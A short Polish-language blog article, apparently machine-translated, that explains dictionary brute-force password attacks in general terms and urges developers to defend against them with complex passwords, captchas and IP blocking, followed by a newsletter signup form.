    Brute force to oparty na słownikach atak brute-force wykorzystujący specjalne programy. Słowniki mogą być różne: łaciński, wyliczenie liczbami, powiedzmy do pewnego zakresu, mieszane (łacina + cyfry), a nawet słowniki z unikalnymi symbolami @ # 4 $% & * ~~ `'” \\? itp.

    Oczywiście tego rodzaju ataku można łatwo uniknąć, tworząc złożone hasło. Nawet captcha może cię uratować. A także, jeśli Twoja witryna jest wykonana w systemie CMS, wielu z nich oblicza ten typ ataku i blokuje IP. Musisz zawsze pamiętać, że im więcej różnych znaków zawiera hasło, tym trudniej je znaleźć.

    Jak działają hakerzy? W większości przypadków podejrzewają lub znają część hasła z wyprzedzeniem. Logiczne jest założenie, że hasło użytkownika z pewnością nie będzie składało się z 3 lub 5 znaków. Te hasła prowadzą do częstych włamań. Zasadniczo hakerzy pobierają zakres od 5 do 10 znaków i dodają tam kilka znaków, które prawdopodobnie znają z góry. Następnie generowane są hasła z wymaganymi zakresami. Dystrybucja Kali linux zawiera nawet programy do takich przypadków. I voila, atak nie potrwa dłużej, ponieważ objętość słownika nie jest już tak duża. Ponadto haker może wykorzystać moc karty graficznej. Niektóre z nich obsługują system CUDA, a prędkość wyszukiwania wzrasta aż 10-krotnie. A teraz widzimy, że atak w tak prosty sposób jest całkiem realny. Ale nie tylko strony internetowe podlegają brutalnej sile.

    Drodzy deweloperzy, nigdy nie zapominajcie o systemie bezpieczeństwa informacji, ponieważ dziś wiele osób, w tym państwa, cierpi na tego typu ataki. W końcu największą podatnością jest osoba, która zawsze może być rozproszona gdzieś lub gdzieś, czego nie można przeoczyć. Jesteśmy programistami, ale nie zaprogramowanymi maszynami. Bądź zawsze czujny, ponieważ utrata informacji grozi poważnymi konsekwencjami!

    DZWON

    Są tacy, którzy czytają tę wiadomość przed tobą.
    Zapisz się, aby otrzymywać najnowsze artykuły.
    E-mail
    Imię
    Nazwisko
    Jak chcesz przeczytać The Bell
    Bez spamu